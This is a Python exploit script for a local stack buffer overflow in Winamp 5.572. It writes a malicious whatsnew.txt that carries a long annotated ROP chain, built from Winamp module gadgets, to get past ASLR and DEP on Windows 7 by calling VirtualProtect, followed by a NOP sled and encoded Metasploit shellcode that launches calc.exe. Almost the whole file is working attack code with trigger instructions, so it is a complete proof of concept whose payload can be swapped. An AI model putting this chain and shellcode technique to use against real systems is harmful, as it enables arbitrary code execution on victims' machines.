#!/usr/bin/python
#Exploit Title: Winamp v5.572 Local BoF Exploit (Win7 ASLR and DEP Bypass)
#Date: June 26, 2010
#Author: Node
#Software Link: http://download.nullsoft.com/winamp/client/winamp5572_full_emusic-7plus_en-us.exe
#Tested on: Windows 7 Ultimate x64 ENG
#Badchars: \'\\x00\\xff\\x5c\\x2f\\x0a\\x0d\\x20\'
#Instructions: Replace generated whatsnew.txt with original in Winamp folder, Start Winamp, rightclick the flash symbol, \"Nullsoft Winamp...\", Version history
print \"[+] Winamp_5.572_whatsnew.txt Win7 ASLR and DEP Bypass - by Node\"
version = \"Winamp 5.572\"
rop = \"A\" * 540 # Offset
rop += \"\\x8a\\x35\\x84\\x07\" #0x0784358A : # PUSH ESP # POP ESI # RETN [Module : in_wm.dll]
rop += \"A\"*16
rop += \"\\x8a\\x3d\\x14\\x07\" #0x07143D8A : # PUSH ESI # SUB AL,5E # XOR EAX,EAX # POP EBP # RETN [Module: zlib.dll]
rop += \"\\xf7\\xb8\\x40\\x07\" #0x0740B8F7 : # XCHG EAX,EBP # RETN [Module : gen_ff.dll]
rop += \"\\xd6\\x5e\\x65\\x07\" #0x07655ED6 : # ADD ESP,30 # RETN [Module : in_cdda.dll]
rop += \"0000\" #VirtualProtect placeholder
rop += \"DDDD\" #return address placeholder
rop += \"1111\" #lpAddress placeholder
rop += \"2222\" #dwsize placeholder
rop += \"3333\" #flNewProtect placeholder
rop += \"\\x60\\xf6\\x78\\x07\" # lpflOldProtect (0x0778f660 writable address in in_mp3.dll)
rop += \"A\"*24
#---------------Grab a kernel32 pointer from the stack--------------------
rop += \"\\x74\\x6c\\x96\\x07\" #0x07966C74 : # XCHG EAX,EDX # RETN [Module : ml_local.dll]
rop += \"\\x1a\\x10\\x09\\x07\" #0x0709101A : # XOR EAX,EAX # RETN [Module : libsndfile.dll]
rop += \"\\x3a\\xd8\\x8d\\x07\"*4 #0x078DD83A : # ADD EAX,41 # RETN [Module : ml_disc.dll]
rop += \"\\x67\\x40\\x5b\\x07\" #0x075B4067 : # MOV ECX,EAX # MOV EAX,ECX # RETN [Module : gen_ml.dll]
rop += \"\\x65\\x72\\x0a\\x07\" #0x070A7265 : # ADD EAX,ECX # RETN [Module : libsndfile.dll]
rop += \"\\x67\\x40\\x5b\\x07\" #0x075B4067 : # MOV ECX,EAX # MOV EAX,ECX # RETN [Module : gen_ml.dll]
rop += \"\\x65\\x72\\x0a\\x07\" #0x070A7265 : # ADD EAX,ECX # RETN [Module : libsndfile.dll]
rop += \"\\x3a\\xd8\\x8d\\x07\"*3 #0x078DD83A : # ADD EAX,41 # RETN [Module : ml_disc.dll]
rop += \"\\x29\\x13\\x09\\x07\"*29 #0x07091329 : # INC EAX # RETN [Module : libsndfile.dll]
rop += \"\\x74\\x6c\\x96\\x07\" #0x07966C74 : # XCHG EAX,EDX # RETN [Module : ml_local.dll]
rop += \"\\xb3\\x6a\\x6c\\x07\" #0x076C6AB3 : # SUB EAX,EDX # RETN [Module : in_flv.dll]
rop += \"\\xa7\\x41\\x11\\x07\" #0x071141A7 : # MOV EAX,DWORD PTR DS:[EAX] # RETN [Module : tataki.dll]
#----------------------EAX=kernel32, ESI=start----------------------
#---------------Change kernel32 pointer to VirtualProtect()-----------------
rop += \"\\x74\\x6c\\x96\\x07\" #0x07966C74 : # XCHG EAX,EDX # RETN [Module : ml_local.dll]
rop += \"\\x1a\\x10\\x09\\x07\" #0x0709101A : # XOR EAX,EAX # RETN [Module : libsndfile.dll]
rop += \"\\x3a\\xd8\\x8d\\x07\"*4 #0x078DD83A : # ADD EAX,41 # RETN [Module : ml_disc.dll] 104
rop += \"\\x67\\x40\\x5b\\x07\" #0x075B4067 : # MOV ECX,EAX # MOV EAX,ECX # RETN [Module : gen_ml.dll]
rop += \"\\x65\\x72\\x0a\\x07\" #0x070A7265 : # ADD EAX,ECX # RETN [Module : libsndfile.dll] 208
rop += \"\\x67\\x40\\x5b\\x07\" #0x075B4067 : # MOV ECX,EAX # MOV EAX,ECX # RETN [Module : gen_ml.dll]
rop += \"\\x65\\x72\\x0a\\x07\" #0x070A7265 : # ADD EAX,ECX # RETN [Module : libsndfile.dll] 410
rop += \"\\x67\\x40\\x5b\\x07\" #0x075B4067 : # MOV ECX,EAX # MOV EAX,ECX # RETN [Module : gen_ml.dll]
rop += \"\\x65\\x72\\x0a\\x07\" #0x070A7265 : # ADD EAX,ECX # RETN [Module : libsndfile.dll] 820
rop += \"\\x67\\x40\\x5b\\x07\" #0x075B4067 : # MOV ECX,EAX # MOV EAX,ECX # RETN [Module : gen_ml.dll]
rop += \"\\x65\\x72\\x0a\\x07\" #0x070A7265 : # ADD EAX,ECX # RETN [Module : libsndfile.dll] 1040
rop += \"\\x67\\x40\\x5b\\x07\" #0x075B4067 : # MOV ECX,EAX # MOV EAX,ECX # RETN [Module : gen_ml.dll]
rop += \"\\x65\\x72\\x0a\\x07\" #0x070A7265 : # ADD EAX,ECX # RETN [Module : libsndfile.dll] 2080
rop += \"\\x08\\x13\\x8d\\x07\" #0x078D1308 : # SUB EAX,41 # RETN [Module : ml_disc.dll] 203f
rop += \"\\xc6\\xd7\\x8d\\x07\" #0x078DD7C6 : # SUB EAX,20 # RETN [Module : ml_disc.dll] 201f
rop += \"\\xec\\x11\\x09\\x07\"*4 #0x070911EC : # DEC EAX # RETN [Module : libsndfile.dll] 201b
rop += \"\\x74\\x6c\\x96\\x07\" #0x07966C74 : # XCHG EAX,EDX # RETN [Module : ml_local.dll]
rop += \"\\x10\\x7d\\x0b\\x07\" #0x070B7D10 : # ADD EAX,EDX # RETN [Module : libsndfile.dll]
#---------------EAX=VirtualProtect(), ESI=start-----------------
#-------------Write VirtualProtect() to stack----------------------
rop += \"\\x82\\x55\\x40\\x07\"*12 #0x07405582 : # INC ESI # RETN [Module : gen_ff.dll]
rop += \"\\x43\\x5d\\x6f\\x07\" #0x076F5D43 : # MOV DWORD PTR DS:[ESI],EAX # RETN [Module : in_midi.dll]
#---------------EAX=VirtualProtect(),ESI=start+12(VP)-----------
#-------------Write return address----------------------
rop += \"\\xdd\\xb7\\x3e\\x07\" #0x073EB7DD : # MOV EAX,ESI # RETN [Module : gen_ff.dll]
rop += \"\\x74\\x6c\\x96\\x07\" #0x07966C74 : # XCHG EAX,EDX # RETN [Module : ml_local.dll]
rop += \"\\x1a\\x10\\x09\\x07\" #0x0709101A : # XOR EAX,EAX # RETN [Module : libsndfile.dll]
rop += \"\\x45\\x35\\x10\\x08\" #0x08103545 : # ADD EAX,104 # POP EBP # RETN [Module : freetype.wac]
rop +=\"AAAA\"
rop += \"\\x45\\x35\\x10\\x08\" #0x08103545 : # ADD EAX,104 # POP EBP # RETN [Module : freetype.wac]
rop +=\"AAAA\"
rop += \"\\x45\\x35\\x10\\x08\" #0x08103545 : # ADD EAX,104 # POP EBP # RETN [Module : freetype.wac]
rop +=\"AAAA\"
rop += \"\\x10\\x7d\\x0b\\x07\" #0x070B7D10 : # ADD EAX,EDX # RETN [Module : libsndfile.dll]
rop += \"\\x82\\x55\\x40\\x07\"*4 #0x07405582 : # INC ESI # RETN [Module : gen_ff.dll]
rop += \"\\x43\\x5d\\x6f\\x07\" #0x076F5D43 : # MOV DWORD PTR DS:[ESI],EAX # RETN [Module : in_midi.dll]
#------------EAX=start+12+312(shellcode),EDX=start+12(VP),ESI=start+16------------
#-------------Write placeholder 1----------------------
rop += \"\\x82\\x55\\x40\\x07\"*4 #0x07405582 : # INC ESI # RETN [Module : gen_ff.dll]
rop += \"\\x43\\x5d\\x6f\\x07\" #0x076F5D43 : # MOV DWORD PTR DS:[ESI],EAX # RETN [Module : in_midi.dll]
#------------EAX=start+12+312(shellcode),EDX=start+12(VP),ESI=start+20------------
#-------------Write placeholder 2----------------------
rop += \"\\x89\\xb3\\x34\\x08\" #0x0834B389 : # XCHG EAX,EBX # RETN [Module : jnetlib.w5s]
rop += \"\\x1a\\x10\\x09\\x07\" #0x0709101A : # XOR EAX,EAX # RETN [Module : libsndfile.dll]
rop += \"\\x45\\x35\\x10\\x08\" #0x08103545 : # ADD EAX,104 # POP EBP # RETN [Module : freetype.wac]
rop +=\"AAAA\"
rop += \"\\x45\\x35\\x10\\x08\" #0x08103545 : # ADD EAX,104 # POP EBP # RETN [Module : freetype.wac]
rop +=\"AAAA\"
rop += \"\\x45\\x35\\x10\\x08\" #0x08103545 : # ADD EAX,104 # POP EBP # RETN [Module : freetype.wac]
rop +=\"AAAA\"
rop += \"\\x82\\x55\\x40\\x07\"*4 #0x07405582 : # INC ESI # RETN [Module : gen_ff.dll]
rop += \"\\x43\\x5d\\x6f\\x07\" #0x076F5D43 : # MOV DWORD PTR DS:[ESI],EAX # RETN [Module : in_midi.dll]
#---------EAX = 0x30c(size 780),EBX = shellcode, ESI=start+24(placeholder 2), EDX=start+12(VP)--------------
#-------------Write placeholder 3----------------------
rop += \"\\x1a\\x10\\x09\\x07\" #0x0709101A : # XOR EAX,EAX # RETN [Module : libsndfile.dll]
rop += \"\\x3a\\xd8\\x8d\\x07\" #0x078DD83A : # ADD EAX,41 # RETN [Module : ml_disc.dll]
rop += \"\\xec\\x11\\x09\\x07\" #0x070911EC : # DEC EAX # RETN [Module : libsndfile.dll]
rop += \"\\x82\\x55\\x40\\x07\"*4 #0x07405582 : # INC ESI # RETN [Module : gen_ff.dll]
rop += \"\\x43\\x5d\\x6f\\x07\" #0x076F5D43 : # MOV DWORD PTR DS:[ESI],EAX # RETN [Module : in_midi.dll]
rop += \"\\x74\\x6c\\x96\\x07\" #0x07966C74 : # XCHG EAX,EDX # RETN [Module : ml_local.dll]
#--------EAX=start+12(VP), EBX=start+12+312(shellcode), ESI=start+28-----------
#----------fix EBP problem after call return----------------
rop += \"\\x89\\xb3\\x34\\x08\" #0x0834B389 : # XCHG EAX,EBX # RETN [Module : jnetlib.w5s]
rop += \"\\x1a\\x10\\x09\\x07\" #0x0709101A : # XOR EAX,EAX # RETN [Module : libsndfile.dll]
rop += \"\\xf7\\xb8\\x40\\x07\" #0x0740B8F7 : # XCHG EAX,EBP # RETN [Module : gen_ff.dll]
rop += \"\\x89\\xb3\\x34\\x08\" #0x0834B389 : # XCHG EAX,EBX # RETN [Module : jnetlib.w5s]
rop += \"\\x85\\xe0\\x09\\x07\" #0x0709E085 : # ADD EBP,EAX # RETN [Module : libsndfile.dll]
#---------EAX=vp, EBX=?, EDX=40, ESI=start+28, EBP=vp--------
#----------------go to VirtualProtect()-------------------
rop += \"\\xc1\\xbb\\x3c\\x07\" #0x073CBBC1 : # XCHG EAX,ESP # RETN [Module : gen_ff.dll]
#------------------------bang!-----------------------------
nops = \"\\x90\"*304
# msfpayload windows/exec CMD=calc.exe R | msfencode -b \'\\x00\\xff\\x5c\\x2f\\x0a\\x0d\\x20\' -t perl
shellcode = (\"\\xbb\\xd2\\xaa\\xfa\\x33\\x31\\xc9\\xb1\\x33\\xdb\\xd3\\xd9\\x74\\x24\" +
\"\\xf4\\x5e\\x83\\xc6\\x04\\x31\\x5e\\x0b\\x03\\x5e\\xd9\\x48\\x0f\\xcf\" +
\"\\x35\\x05\\xf0\\x30\\xc5\\x76\\x78\\xd5\\xf4\\xa4\\x1e\\x9d\\xa4\\x78\" +
\"\\x54\\xf3\\x44\\xf2\\x38\\xe0\\xdf\\x76\\x95\\x07\\x68\\x3c\\xc3\\x26\" +
\"\\x69\\xf0\\xcb\\xe5\\xa9\\x92\\xb7\\xf7\\xfd\\x74\\x89\\x37\\xf0\\x75\" +
\"\\xce\\x2a\\xfa\\x24\\x87\\x21\\xa8\\xd8\\xac\\x74\\x70\\xd8\\x62\\xf3\" +
\"\\xc8\\xa2\\x07\\xc4\\xbc\\x18\\x09\\x15\\x6c\\x16\\x41\\x8d\\x07\\x70\" +
\"\\x72\\xac\\xc4\\x62\\x4e\\xe7\\x61\\x50\\x24\\xf6\\xa3\\xa8\\xc5\\xc8\" +
\"\\x8b\\x67\\xf8\\xe4\\x06\\x79\\x3c\\xc2\\xf8\\x0c\\x36\\x30\\x85\\x16\" +
\"\\x8d\\x4a\\x51\\x92\\x10\\xec\\x12\\x04\\xf1\\x0c\\xf7\\xd3\\x72\\x02\" +
\"\\xbc\\x90\\xdd\\x07\\x43\\x74\\x56\\x33\\xc8\\x7b\\xb9\\xb5\\x8a\\x5f\" +
\"\\x1d\\x9d\\x49\\xc1\\x04\\x7b\\x3c\\xfe\\x57\\x23\\xe1\\x5a\\x13\\xc6\" +
\"\\xf6\\xdd\\x7e\\x8d\\x09\\x6f\\x05\\xe8\\x09\\x6f\\x06\\x5b\\x61\\x5e\" +
\"\\x8d\\x34\\xf6\\x5f\\x44\\x71\\x08\\x2a\\xc5\\xd0\\x80\\xf3\\x9f\\x60\" +
\"\\xcd\\x03\\x4a\\xa6\\xeb\\x87\\x7f\\x57\\x08\\x97\\xf5\\x52\\x55\\x1f\" +
\"\\xe5\\x2e\\xc6\\xca\\x09\\x9c\\xe7\\xde\\x69\\x43\\x7b\\x82\\x43\\xe6\" +
\"\\xfb\\x21\\x9c\\xe2\");
trash = \"B\" * 600
expfile = open(\'whatsnew.txt\',\'w\')
expfile.write(version + rop + nops + shellcode + trash)
print \"[+] whatsnew.txt generated.\"
expfile.close()
暂无评论